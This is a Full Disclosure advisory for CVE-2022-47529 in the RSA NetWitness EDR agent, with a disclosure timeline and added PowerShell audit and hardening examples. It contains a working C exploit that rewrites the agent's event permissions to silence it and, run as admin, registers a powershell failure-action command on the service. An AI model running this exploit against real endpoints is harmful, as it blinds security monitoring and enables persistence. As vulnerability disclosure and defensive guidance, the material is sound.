List: full-disclosure
Subject: [FD] RSA NetWitness Platform EDR / Incorrect Access Control - Code Execution
From: hyp3rlinx <apparitionsec () gmail ! com>
Date: 2023-03-27 20:42:20
Message-ID: CAFD2FDM1mjdxRotATddh8EFR0_yCFcfKyiZcFTn7YepQT06x-w () mail ! gmail ! com
Attachment: "RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt" (text/plain)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
RSA Security
www.netwitness.com
[Product]
NetWitness Endpoint EDR Agent
The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your
endpoints—on and off the network—providing deep visibility into their security state, and it
prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by
rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost,
time and scope of incident response.
[Vulnerability Type]
Incorrect Access Control / Code Execution
[CVE Reference]
CVE-2022-47529
[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending events to the
SIEM, or to make the agent service run user-supplied commands.

Insecurely ACL'd Win32 kernel objects (the agent's named events Global\Ecat002 and
Global\Ecat004, the "Win32 memory objects" of the CVE description) in Endpoint Windows Agents in
the NetWitness Platform through 12.x allow local Windows user accounts to modify the endpoint
agent service configuration: a standard user can disable the agent completely, and an
administrator can additionally make the service run user-supplied code or commands, thereby
bypassing the tamper-protection features via ACL modification.

Interestingly, the agent binary had already been uploaded to VirusTotal on 2022-01-05 17:24:32 UTC,
months before this finding and report.
SHA-256: 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe
[Severity]
Critical
[Impact(s)]
Denial-of-Service
Arbitrary Code Execution
[Attack Vector]
To exploit, open handles to the named event objects held by the endpoint agent and, on the ones
whose ACLs are insecure (that is, grant a standard user WRITE_DAC), rewrite the DACL to DENY all
access to the Everyone group. Handles opened before the change keep the access they were granted
at open time, so the exploit then Sets/Resets the events through them and the agent stops sending
events. With admin rights the service configuration can additionally be changed.
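An added audit check, not part of the original advisory: the PowerShell below reads the DACL of the named events the PoC targets from an ordinary user session and flags any Allow ACE that gives a low-privilege principal WRITE_DAC, WRITE_OWNER or EVENT_MODIFY_STATE, which is what the attack above depends on. It assumes Windows PowerShell 5.1 (.NET Framework) on a host with the agent installed; the event names are the ones this advisory lists, while the SID table, the choice of rights and the function name are this example's own assumptions, not anything from NetWitness.

```powershell
# Added audit check, not part of the original advisory. Reads the DACL of the
# agent's named events from a normal user session and flags ACEs that grant a
# low-privilege principal the rights the attack needs. Assumes Windows
# PowerShell 5.1 (.NET Framework); event names are those from the advisory,
# the SID table and right selection are this example's own assumptions.

$TargetEvents = @('Global\Ecat002', 'Global\Ecat004')

# Well-known principals that any interactive standard user falls under.
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'Users'
    'S-1-5-4'      = 'Interactive'
}

# ChangePermissions = WRITE_DAC (what the PoC uses), TakeOwnership = WRITE_OWNER
# (gets WRITE_DAC indirectly), Modify = EVENT_MODIFY_STATE (Set/Reset directly).
$Rights = [System.Security.AccessControl.EventWaitHandleRights]
$DangerousRights = $Rights::ChangePermissions -bor $Rights::TakeOwnership -bor $Rights::Modify

function Test-EventDacl {
    param([Parameter(Mandatory)][string]$Name)

    # Open with READ_CONTROL only: this never touches the event's state.
    try {
        $ev = [System.Threading.EventWaitHandle]::OpenExisting($Name, $Rights::ReadPermissions)
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        return [pscustomobject]@{ Name = $Name; Status = 'NotPresent'; Sddl = ''; Findings = @() }
    } catch [System.UnauthorizedAccessException] {
        # Even READ_CONTROL is refused. A deny-Everyone ACE, which is what the
        # PoC leaves behind, produces exactly this for every non-owner.
        return [pscustomobject]@{ Name = $Name; Status = 'AccessDenied'; Sddl = ''; Findings = @() }
    }

    try {
        $acl   = $ev.GetAccessControl()
        $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        $findings = foreach ($rule in $rules) {
            $sid = $rule.IdentityReference.Value
            if ($rule.AccessControlType -eq 'Allow' -and $LowPrivSids.ContainsKey($sid) -and
                (($rule.EventWaitHandleRights -band $DangerousRights) -ne 0)) {
                '{0} ({1}) allowed {2}' -f $LowPrivSids[$sid], $sid, $rule.EventWaitHandleRights
            }
        }
        [pscustomobject]@{
            Name     = $Name
            Status   = $(if ($findings) { 'Weak' } else { 'Ok' })
            Sddl     = $acl.GetSecurityDescriptorSddlForm('Access')
            Findings = @($findings)
        }
    } finally {
        $ev.Close()
    }
}

foreach ($name in $TargetEvents) {
    $r = Test-EventDacl -Name $name
    '{0,-16} {1}  {2}' -f $r.Name, $r.Status, $r.Sddl
    $r.Findings | ForEach-Object { "    [!] $_" }
}
```

A Weak result on a build before the fix is the condition this advisory describes; an AccessDenied result for a standard user means even READ_CONTROL is refused, which is the state the PoC's deny-Everyone ACE leaves behind and is worth treating as tampering if the agent is still supposed to be reporting. For the admin-side path, `sc qfailure NWEAgent` shows whether a failure-action command has been registered on the service.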
[Affected Product Code Base]
All versions prior to v12.2
[Network Access]
Local
[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935
[Vuln Code Block]
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
[Exploit/POC]
"RSA_NetWitness_Exploit.c"
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <accctrl.h>
#include <aclapi.h>

/* Needs advapi32 for GetSecurityInfo/SetSecurityInfo/SetEntriesInAcl, e.g.
   MSVC:  cl RSA_NetWitness_Exploit.c advapi32.lib
   MinGW: gcc RSA_NetWitness_Exploit.c -o RSA_NetWitness_Exploit.exe -ladvapi32 */

#define OPEN_ALL_ACCESS 0x1F0003   /* == EVENT_ALL_ACCESS */

/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49

Expected result: Low privileged standard users are prevented from interfering with or
modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard
non-administrator user.

By John Page (hyp3rlinx) - Nov 2022

DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever
from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no
harm.

X64 PE file vuln code block:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C

1) Install "RSA NetWitness.msi" (Endpoint EDR Agent)
2) Run the Exploit PoC as a standard non-admin user; the PoC will:
   a) Open a handle (copy) to the Ecat002 event.
   b) Open additional handles for events Ecat004 and Ecat002, modifying their DACLs to deny
      access to the Everyone group.
   c) Set/Reset the event through the Ecat002 handle.
   d) If running with admin privileges, change the EDR service configuration.
Non-vulnerable agents will print "Not vulnerable!" to the console; customers can modify and
use this test to check whether they are affected.
*/

char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED = FALSE;

void Exploit(void);
int AdminChk(void);
void HijackSvcConfig(void);

int main(void){
    printf("[+] RSA NetWitness EDR Agent 0Day\n");
    printf("[+] CVE-2022-47529\n");
    printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
    printf("[+] ===================================\n");
    Exploit();
    if(AdminChk()){
        printf("[+] Hijacked NetWitness Agent Service!\n");
        HijackSvcConfig();
    }
    Sleep(2000);
    printf("[+] Done!\n\n");
    system("pause");
    return 0;
}

void Exploit(void){
    PSECURITY_DESCRIPTOR pSD = NULL;   /* buffer that pOldDACL points into; freed with LocalFree */
    PACL pOldDACL = NULL;
    PACL pNewDACL = NULL;
    DWORD rc;
    size_t i;

    /* Second handle to Ecat002, used only to Set/Reset the event after its ACL has been changed. */
    HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS, FALSE, "Global\\Ecat002");

    for(i = 0; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
        /* OpenEvent returns NULL on failure, not INVALID_HANDLE_VALUE. */
        HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS, FALSE, Vuln_Events[i]);
        if(hEvent == NULL){
            printf("[!] Could not open %s (error %lu)\n", Vuln_Events[i], GetLastError());
            continue;
        }
        printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
        Sleep(500);

        if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                           NULL, NULL, &pOldDACL, NULL, &pSD) == ERROR_SUCCESS){
            TRUSTEE trustee[1];
            EXPLICIT_ACCESS explicit_access_list[1];

            /* Trustee: the Everyone group. */
            trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
            trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
            trustee[0].ptstrName = (LPTSTR)TEXT("Everyone");
            trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
            trustee[0].pMultipleTrustee = NULL;

            /* Prepend a DENY GENERIC_ALL ACE for Everyone to the existing DACL. */
            ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
            explicit_access_list[0].grfAccessMode = DENY_ACCESS;
            explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
            explicit_access_list[0].grfInheritance = NO_INHERITANCE;
            explicit_access_list[0].Trustee = trustee[0];

            rc = SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL);
            if(rc != ERROR_SUCCESS){
                printf("[!] Not vulnerable! %lu\n", rc);
            }else{
                /* This write needs WRITE_DAC on the object; a sane ACL refuses it to a standard user. */
                rc = SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                                     NULL, NULL, pNewDACL, NULL);
                if(rc != ERROR_SUCCESS){
                    printf("[!] Not vulnerable! %lu\n", rc);
                }else{
                    /* DACL replaced; handles we already hold keep their access, so pulse the events. */
                    if(hEvent_Ecat002 != NULL){
                        SetEvent(hEvent_Ecat002);
                        Sleep(1000);
                        ResetEvent(hEvent_Ecat002);
                        CloseHandle(hEvent_Ecat002);
                        hEvent_Ecat002 = NULL;
                    }
                    SetEvent(hEvent);
                    Sleep(1000);
                    PWNED = TRUE;
                }
            }
            if(pNewDACL){ LocalFree(pNewDACL); pNewDACL = NULL; }
            if(pSD){ LocalFree(pSD); pSD = NULL; pOldDACL = NULL; }
        }
        CloseHandle(hEvent);
        Sleep(1000);
    }
    if(hEvent_Ecat002 != NULL){
        CloseHandle(hEvent_Ecat002);
    }
}

/* Returns non-zero when running from an elevated (admin) token. */
int AdminChk(void){
    int result = 0;
    HANDLE hToken = NULL;
    if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)){
        TOKEN_ELEVATION elevated;
        DWORD tokSize = sizeof(TOKEN_ELEVATION);
        if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){
            result = elevated.TokenIsElevated;
        }
    }
    if(hToken){
        CloseHandle(hToken);
    }
    return result;
}

/* If run as admin, modify the agent service config to run our own code.
   Trivial example: register a service failure action so the SCM runs the command
   when the NWEAgent service fails. Note that sc only acts on command= when a
   matching actions= run/<delay> entry (with reset=) is also set; "Evil-Command-Here"
   is a placeholder. */
void HijackSvcConfig(void){
    Sleep(1000);
    WinExec("sc failure NWEAgent command= "
            "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Evil-Command-Here\"", 0);
}
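The disassembly above shows CreateEventW called with lpEventAttributes = NULL (xor ecx, ecx), that is, with no caller-chosen security descriptor; whatever the agent's effective descriptor was, the PoC establishes only that a standard user could obtain WRITE_DAC on Global\Ecat002 and Global\Ecat004. The added example below is not vendor code and not from the original post; it shows the pattern a tamper-resistant service should use for its cross-session objects: create the event with an explicit DACL that gives write-capable rights only to SYSTEM and Administrators, cut down the owner's implicit rights with the OWNER RIGHTS SID, and verify from the calling context that WRITE_DAC cannot be obtained. It assumes Windows PowerShell 5.1 (the .NET Framework EventWaitHandle constructor that takes an EventWaitHandleSecurity); the event name, the SDDL string and the function names are made up for the demo.

```powershell
# Added hardening example, not vendor code and not from the original post.
# Creates a named event with an explicit DACL and checks, from the calling
# context, whether WRITE_DAC can be obtained on it. Assumes Windows PowerShell
# 5.1 (.NET Framework EventWaitHandle constructor taking an
# EventWaitHandleSecurity). Event name, SDDL and function names are made up.
# A service would use Global\ (needs SeCreateGlobalPrivilege); Local\ keeps the
# demo runnable as any user.

$DemoName = 'Local\HardenedEventDemo'

# SYSTEM and Administrators: full control. Authenticated Users: SYNCHRONIZE +
# READ_CONTROL (0x120000) so they can wait on and audit the event but not
# Set/Reset it or rewrite its ACL. OWNER RIGHTS (OW): READ_CONTROL only, which
# replaces the implicit READ_CONTROL|WRITE_DAC an owner would otherwise keep.
$HardenedSddl = 'D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;0x120000;;;AU)(A;;0x20000;;;OW)'

function New-HardenedEvent {
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$Sddl)

    $sec = New-Object System.Security.AccessControl.EventWaitHandleSecurity
    $sec.SetSecurityDescriptorSddlForm($Sddl)
    $createdNew = $false
    # The descriptor is applied at creation; passing $null here is the
    # "take the creating token's default DACL" path (lpEventAttributes = NULL).
    $ev = [System.Threading.EventWaitHandle]::new(
        $false, [System.Threading.EventResetMode]::ManualReset, $Name, [ref]$createdNew, $sec)
    if (-not $createdNew) {
        # Name squatting: someone else created it first, with their DACL.
        $ev.Close()
        throw "$Name already exists; refusing to reuse an object we did not create"
    }
    return $ev
}

function Test-CanChangeDacl {
    param([Parameter(Mandatory)][string]$Name)
    # Ask for WRITE_DAC only, the single right the PoC depends on.
    try {
        $h = [System.Threading.EventWaitHandle]::OpenExisting(
            $Name, [System.Security.AccessControl.EventWaitHandleRights]::ChangePermissions)
        $h.Close()
        return $true
    } catch [System.UnauthorizedAccessException] {
        return $false
    }
}

$ev = New-HardenedEvent -Name $DemoName -Sddl $HardenedSddl
try {
    'Effective DACL       : ' + $ev.GetAccessControl().GetSecurityDescriptorSddlForm('Access')
    'Caller gets WRITE_DAC: ' + (Test-CanChangeDacl -Name $DemoName)
} finally {
    $ev.Close()   # last handle gone, the object is destroyed
}
```

Run as a standard user the second line reports False (Authenticated Users plus OWNER RIGHTS give no WRITE_DAC); run elevated it reports True through the BA ACE, which is the intended split. The same GetSecurityDescriptorSddlForm call against the real agent objects is how to verify a fixed build: a descriptor that still grants WD, AU or BU any of WRITE_DAC, WRITE_OWNER or EVENT_MODIFY_STATE is the condition this advisory describes.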
[POC Video URL]
https://www.youtube.com/watch?v=kO1fu4IOlSs
[Disclosure Timeline]
Vendor Notification: December 2, 2022
CVE assigned: December 19, 2022
Hotfix v12.1.0.1: January 3, 2023
Fixed in v12.2.0.0: January 4, 2023
Retested for vendor: January 6, 2023
Public Disclosure: March 24, 2023
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or
guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of
this advisory, provided that it is not altered except by reformatting it, and that due credit is
given. Permission is explicitly given for insertion in vulnerability databases and similar,
provided that due credit is given to the author. The author is not responsible for any misuse of
the information contained herein and accepts no responsibility for any damage caused by the use
or misuse of this information. The author prohibits any malicious use of security related
information or exploits by the author or elsewhere. All content (c).
hyp3rlinx
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/